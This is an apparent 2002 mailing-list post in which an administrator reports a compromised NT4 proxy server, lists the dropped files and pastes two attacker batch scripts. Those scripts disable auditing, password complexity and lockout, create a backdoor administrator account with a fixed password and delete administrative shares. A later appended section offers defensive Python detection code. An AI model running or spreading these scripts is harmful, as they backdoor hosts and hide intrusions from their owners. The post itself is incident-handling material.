Proxy server hit... Any ideas?

From: Mike Cain (mikec@lpinsurance.com)
Date: 11/18/02

    From: "Mike Cain" <mikec@lpinsurance.com>
    To: <incidents@securityfocus.com>
    Date: Mon, 18 Nov 2002 08:00:43 -0600
    
    

    Well, I have had my first run-in with a hacker, or was it a virus? I'm
    not 100% sure... Guess I should start from the beginning...

    A few days ago, I began to get user complaints on the slowness of the
    internet. I figured it was mostly them just wanting something to
    complain about, so I did what all crappy admins do, I ignored it. Well,
    last night the box was rebooted after some software was updated. Today
    people were complaining about how PAINFULLY slow the internet was, so I
    looked at the proxy server. NT4 running proxy3. I know, there is newer
    better stuff, but it's what I have to work with. :) SO... I looked at the
    processes and noticed the CPU hovering at 35-50%... Way too high. So a
    quick look at the process list showed two things that I didn't remember
    needing to be there, win.exe and start.exe. Next move was to find them,
    and they were in the winnt\system\ folder. What I also found odd was
    that there were three new folders in that directory, all created on the
    8th: NT, tools, and win.

    Here are the contents, respectively.
    1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe (antivirus sees this one as a
    backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll
    (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup

    2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
    srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
    Routine), and _zoLibr.dll

    3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp,
    x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below), pidv32.dll,
    win.exe, x32.dll.bkup

    SO, anyone know what I have or what hit me? From looking at the secure
    and secure1 batch files, it looks like a root kit... But I'm new at
    this side of security (I'm a Cisco guy...)

    Last thing, the logs show that the attacker was hitting the
    \scripts\sample\ folder... Meaning I think he was trying to use the old
    IIS Sample Scripts to execute local code... Not sure if he was
    successful...

    Thanks in advance!!

    Mike Cain
    CCNP/MCSE

    Secure.bat =
    @echo off
    del temp
    echo Compiling New Security Policy ...
    echo [Version] >> temp
    echo signature="$CHICAGO$" >> temp
    echo Revision=1 >> temp
    echo [Profile Description] >> temp
    echo Description=Default Security Settings. (Windows 2000 Professional) >> temp
    echo [System Access] >> temp
    echo MinimumPasswordAge = 0 >> temp
    echo MaximumPasswordAge = 42 >> temp
    echo MinimumPasswordLength = 0 >> temp
    echo PasswordComplexity = 0 >> temp
    echo PasswordHistorySize = 0 >> temp
    echo LockoutBadCount = 0 >> temp
    echo RequireLogonToChangePassword = 0 >> temp
    echo ClearTextPassword = 0 >> temp
    echo [Event Audit] >> temp
    echo AuditSystemEvents = 0 >> temp
    echo AuditLogonEvents = 0 >> temp
    echo AuditObjectAccess = 0 >> temp
    echo AuditPrivilegeUse = 0 >> temp
    echo AuditPolicyChange = 0 >> temp
    echo AuditAccountManage = 0 >> temp
    echo AuditProcessTracking = 0 >> temp
    echo AuditDSAccess = 0 >> temp
    echo AuditAccountLogon = 0 >> temp
    echo [Registry Values] >> temp
    echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
    echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
    echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
    echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
    echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
    echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
    echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
    echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
    echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
    echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
    echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
    echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
    echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
    echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
    echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
    echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
    echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
    echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
    echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
    echo [Privilege Rights] >> temp
    echo seassignprimarytokenprivilege = >> temp
    echo seauditprivilege = >> temp
    echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
    echo sebatchlogonright = >> temp
    echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
    echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
    echo secreatepermanentprivilege = >> temp
    echo secreatetokenprivilege = >> temp
    echo sedebugprivilege = *S-1-5-32-544 >> temp
    echo sedenybatchlogonright = >> temp
    echo sedenyinteractivelogonright = >> temp
    echo sedenynetworklogonright = >> temp
    echo sedenyservicelogonright = >> temp
    echo seenabledelegationprivilege = >> temp
    echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
    echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
    echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
    echo seloaddriverprivilege = *S-1-5-32-544 >> temp
    echo selockmemoryprivilege = >> temp
    echo semachineaccountprivilege = >> temp
    echo senetworklogonright = %1 >> temp
    echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
    echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
    echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
    echo sesecurityprivilege = *S-1-5-32-544 >> temp
    echo seservicelogonright = >> temp
    echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
    echo sesyncagentprivilege = >> temp
    echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
    echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
    echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
    echo setakeownershipprivilege = *S-1-5-32-544 >> temp
    echo setcbprivilege = >> temp
    echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp
    echo Adding User %1 with the Password %2 ...
    net user /add slash 971985
    echo Adding slash to the Local Administrator Group ...
    net localgroup administrators slash /add
    echo Loading New Security Policy ...
    secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
    echo System is now secure.

    Secure1.bat

    net share /delete C$ /y > net.deld
    net share /delete D$ /y >> net.deld
    net share /delete E$ /y >> net.deld
    net share /delete F$ /y >> net.deld
    net share /delete G$ /y >> net.deld
    net share /delete H$ /y >> net.deld
    net share /delete I$ /y >> net.deld
    net share /delete J$ /y >> net.deld
    net share /delete K$ /y >> net.deld
    net share /delete L$ /y >> net.deld
    net share /delete M$ /y >> net.deld
    net share /delete N$ /y >> net.deld
    net share /delete O$ /y >> net.deld
    net share /delete P$ /y >> net.deld
    net share /delete Q$ /y >> net.deld
    net share /delete R$ /y >> net.deld
    net share /delete S$ /y >> net.deld
    net share /delete T$ /y >> net.deld
    net share /delete U$ /y >> net.deld
    net share /delete V$ /y >> net.deld
    net share /delete W$ /y >> net.deld
    net share /delete X$ /y >> net.deld
    net share /delete Y$ /y >> net.deld
    net share /delete Z$ /y >> net.deld
    net share /delete ADMIN$ /y >> net.deld
    #net share /delete IPC$ /y >> net.deld
    del net.deld

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
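The two batch files above build an INF-style security template (the `temp` file fed to `secedit.exe /configure`), add a local administrator, and remove the administrative shares. As an added example, not code from the original post or from anyone in this thread, here is a small Python triage helper for an incident like this one: it parses such a template into sections, flags the settings that weaken the host (auditing categories turned off, password complexity and lockout disabled, anonymous enumeration allowed, LM responses still sent), and scans the batch file itself for the account, group, share and policy changes a responder would want to escalate. The two sample inputs are constructed, reduced copies of what the post shows, and the hardening baseline the checks compare against (minimum length 8, `lmcompatibilitylevel` at least 2, and so on) is my assumption, not something stated in the post.

```python
# Added example, not code from the original post: parse the INF-style template that
# secure.bat writes into 'temp', flag weakened settings, and scan the batch itself.
import re
from typing import Dict, List, Tuple

# Constructed sample: a reduced copy of the template the posted secure.bat builds.
SAMPLE_TEMPLATE = r"""[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Event Audit]
AuditLogonEvents = 0
AuditAccountManage = 0
[Registry Values]
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0
"""

# Constructed sample: the action lines from secure.bat / secure1.bat as posted.
SAMPLE_BATCH = r"""@echo off
net user /add slash 971985
net localgroup administrators slash /add
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
net share /delete ADMIN$ /y >> net.deld
#net share /delete IPC$ /y >> net.deld
"""


def parse_secedit_inf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse '[Section]' / 'key = value' lines into {section: {key: value}};
    section names and keys are lower-cased so comparisons are case-insensitive."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][key.strip().lower()] = value.strip()
    return sections


# Baseline used here (an assumption, not from the post): complexity and lockout on, minimum
# length 8, no anonymous enumeration, no LM responses. Registry entries are 'type,data'.
LSA = r"machine\system\currentcontrolset\control\lsa"
WEAKENING_CHECKS = [  # (section, key, predicate on the raw value, explanation)
    ("system access", "passwordcomplexity", lambda v: v == "0", "password complexity disabled"),
    ("system access", "lockoutbadcount", lambda v: v == "0", "account lockout disabled"),
    ("system access", "minimumpasswordlength", lambda v: int(v) < 8, "minimum password length below 8"),
    ("registry values", LSA + r"\restrictanonymous", lambda v: v.split(",")[-1] == "0", "anonymous enumeration allowed"),
    ("registry values", LSA + r"\lmcompatibilitylevel", lambda v: int(v.split(",")[-1]) < 2, "LM responses still sent"),
]


def audit_findings(sections: Dict[str, Dict[str, str]]) -> List[str]:
    """Return one readable finding per weakened setting in a parsed template."""
    findings = []
    for section, key, is_weak, why in WEAKENING_CHECKS:
        value = sections.get(section, {}).get(key)
        if value is not None and is_weak(value):
            findings.append(f"[{section}] {key}={value}: {why}")
    # Any audit category set to 0 means those events are no longer recorded at all.
    for key, value in sections.get("event audit", {}).items():
        if value == "0":
            findings.append(f"[event audit] {key}=0: auditing category disabled")
    return findings


BATCH_INDICATORS = [
    (re.compile(r"^\s*net\s+user\b.*\s/add\b", re.I), "local account created"),
    (re.compile(r"^\s*net\s+localgroup\s+administrators\b.*\s/add\b", re.I), "account added to Administrators"),
    (re.compile(r"^\s*net\s+share\s+/delete\b", re.I), "administrative share removed"),
    (re.compile(r"^\s*secedit(?:\.exe)?\s+/configure\b", re.I), "security policy applied via secedit"),
]


def scan_batch(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, label, line) for each batch line matching an indicator."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        # cmd.exe has no '#' comments; a '#net ...' line just fails, so treat it as inert.
        if stripped.lower().startswith(("#", "rem ", "::")):
            continue
        for pattern, label in BATCH_INDICATORS:
            if pattern.search(line):
                hits.append((lineno, label, stripped))
                break
    return hits
```

Running `audit_findings(parse_secedit_inf(SAMPLE_TEMPLATE))` on the sample yields seven findings (five from the explicit checks, two from the disabled audit categories), and `scan_batch(SAMPLE_BATCH)` reports the account creation, the group change, the `secedit` run and the share deletion with their line numbers, which is the list a responder would hand to whoever rebuilds the box. The same parser can be pointed at a known-good template exported from a clean host to diff the two.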
